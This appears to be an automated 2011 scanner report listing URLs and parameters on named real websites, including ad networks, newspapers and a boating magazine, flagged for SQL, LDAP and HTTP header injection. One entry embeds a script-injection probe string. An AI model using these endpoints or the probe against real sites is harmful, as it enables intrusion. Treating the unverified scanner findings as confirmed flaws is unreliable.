Vulnerability Reports for January 29, 2011, SQL Injection, XSS

CWE-79, CWE-89, CWE-113 Report for 1-29-2011 | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sat Jan 29 08:38:47 CST 2011.


1. SQL injection

1.1. http://4c28d6.r.axf8.net/mr/a.gif [a parameter]

1.2. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

1.3. http://ad.doubleclick.net/adj/N3340.trfu/B4938104.54 [sz parameter]

1.4. http://ad.doubleclick.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]

1.5. http://ads2.adbrite.com/v0/ad [zs parameter]

1.6. http://amch.questionmarket.com/adscgen/st.php [REST URL parameter 2]

1.7. http://amch.questionmarket.com/adscgen/st.php [name of an arbitrarily supplied request parameter]

1.8. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 1]

1.9. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 3]

1.10. http://cafr.imlive.com/waccess/ [REST URL parameter 1]

1.11. http://de.imlive.com/waccess/ [REST URL parameter 1]

1.12. http://es.imlive.com/waccess/ [REST URL parameter 1]

1.13. http://fr.imlive.com/waccess/ [gotopage parameter]

1.14. http://gr.imlive.com/waccess/ [REST URL parameter 1]

1.15. http://ib.adnxs.com/getuid [User-Agent HTTP header]

1.16. http://it.imlive.com/waccess/ [REST URL parameter 1]

1.17. http://local.nissanusa.com/zip.aspx [__utmz cookie]

1.18. http://local.nissanusa.com/zip.aspx [regionalZipCode parameter]

1.19. http://local.nissanusa.com/zip.aspx [vehicle parameter]

1.20. http://nl.imlive.com/waccess/ [REST URL parameter 1]

1.21. http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx [team parameter]

1.22. http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx [team parameter]

1.23. http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx [team parameter]

1.24. http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx [team parameter]

1.25. http://tap.rubiconproject.com/oz/sensor [au cookie]

1.26. http://tap.rubiconproject.com/oz/sensor [name of an arbitrarily supplied request parameter]

1.27. http://tap.rubiconproject.com/oz/sensor [pc parameter]

1.28. http://tr.imlive.com/waccess/ [REST URL parameter 1]

1.29. http://tr.imlive.com/waccess/ [gotopage parameter]

1.30. http://twitter.com/ [Referer HTTP header]

1.31. http://twitter.com/ [original_referer cookie]

1.32. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

1.33. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

1.34. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]

1.35. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

1.36. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

1.37. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

1.38. http://www.dominionenterprises.com/main/do/Terms_of_Use [REST URL parameter 2]

1.39. http://www.nissanusa.com/ [name of an arbitrarily supplied request parameter]

1.40. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html [REST URL parameter 3]

1.41. https://www.paperg.com/post.php [bid parameter]

1.42. http://www.soundingsonline.com/ [name of an arbitrarily supplied request parameter]

1.43. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

1.44. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

1.45. http://www.soundingsonline.com/archives [name of an arbitrarily supplied request parameter]

1.46. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

1.47. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

1.48. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

1.49. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

1.50. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

1.51. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

1.52. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

1.53. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

1.54. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

1.55. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

1.56. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

1.57. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

1.58. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

1.59. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

1.60. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

1.61. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

1.62. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

1.63. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 1]

1.64. http://www.soundingsonline.com/component/chronocontact/ [REST URL parameter 2]

1.65. http://www.soundingsonline.com/component/chronocontact/ [chronoformname parameter]

1.66. http://www.soundingsonline.com/component/chronocontact/ [name of an arbitrarily supplied request parameter]

1.67. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 2]

1.68. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 3]

1.69. http://www.soundingsonline.com/component/content/article/237622 [REST URL parameter 4]

1.70. http://www.soundingsonline.com/component/content/article/237622 [name of an arbitrarily supplied request parameter]

1.71. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 1]

1.72. http://www.soundingsonline.com/component/mailto/ [REST URL parameter 2]

1.73. http://www.soundingsonline.com/component/mailto/ [link parameter]

1.74. http://www.soundingsonline.com/component/mailto/ [name of an arbitrarily supplied request parameter]

1.75. http://www.soundingsonline.com/component/mailto/ [tmpl parameter]

1.76. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 1]

1.77. http://www.soundingsonline.com/component/yvcomment/ [REST URL parameter 2]

1.78. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]

1.79. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

1.80. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

1.81. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]

1.82. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

1.83. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

1.84. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

1.85. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

1.86. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

1.87. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

1.88. http://www.soundingsonline.com/index.php [Itemid parameter]

1.89. http://www.soundingsonline.com/index.php [chronoformname parameter]

1.90. http://www.soundingsonline.com/index.php [id parameter]

1.91. http://www.soundingsonline.com/index.php [layout parameter]

1.92. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

1.93. http://www.soundingsonline.com/index.php [option parameter]

1.94. http://www.soundingsonline.com/index.php [view parameter]

1.95. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

1.96. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

1.97. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

1.98. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

1.99. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

1.100. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

1.101. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

1.102. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan ['%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E parameter]

1.103. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]

1.104. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 2]

1.105. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3]

1.106. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [REST URL parameter 3]

1.107. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [count cookie]

1.108. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]

1.109. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [name of an arbitrarily supplied request parameter]

1.110. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [page parameter]

1.111. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [print parameter]

1.112. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan [tmpl parameter]

1.113. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]

1.114. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

1.115. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

1.116. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

1.117. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

1.118. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

1.119. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

1.120. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter [name of an arbitrarily supplied request parameter]

1.121. http://www.spicefactory.org/parsley [Referer HTTP header]

1.122. http://www.spicefactory.org/parsley [User-Agent HTTP header]

2. LDAP injection

2.1. http://a.tribalfusion.com/j.ad [size parameter]

2.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXZuDY9-JNctdlx3I0VSaliO7Vdbu-ffjKQ==/click.txt [NSC_betivggmf-opef cookie]

3. HTTP header injection

3.1. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [;ord parameter]

3.2. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

3.3. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

3.4. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

3.5. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

3.6. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

3.7. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

3.8. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

3.9. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

3.10. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

3.11. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

3.12. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

3.13. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

3.14. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

3.15. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

3.16. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

3.17. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

3.18. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

3.19. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]

3.20. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

3.21. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [name of an arbitrarily supplied request parameter]

3.22. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ [ord parameter]

3.23. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [name of an arbitrarily supplied request parameter]

3.24. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/ [ord parameter]

3.25. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 3]

3.26. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 4]

3.27. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [REST URL parameter 5]

3.28. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [a parameter]

3.29. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcc parameter]

3.30. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcn parameter]

3.31. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [dcp parameter]

3.32. http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

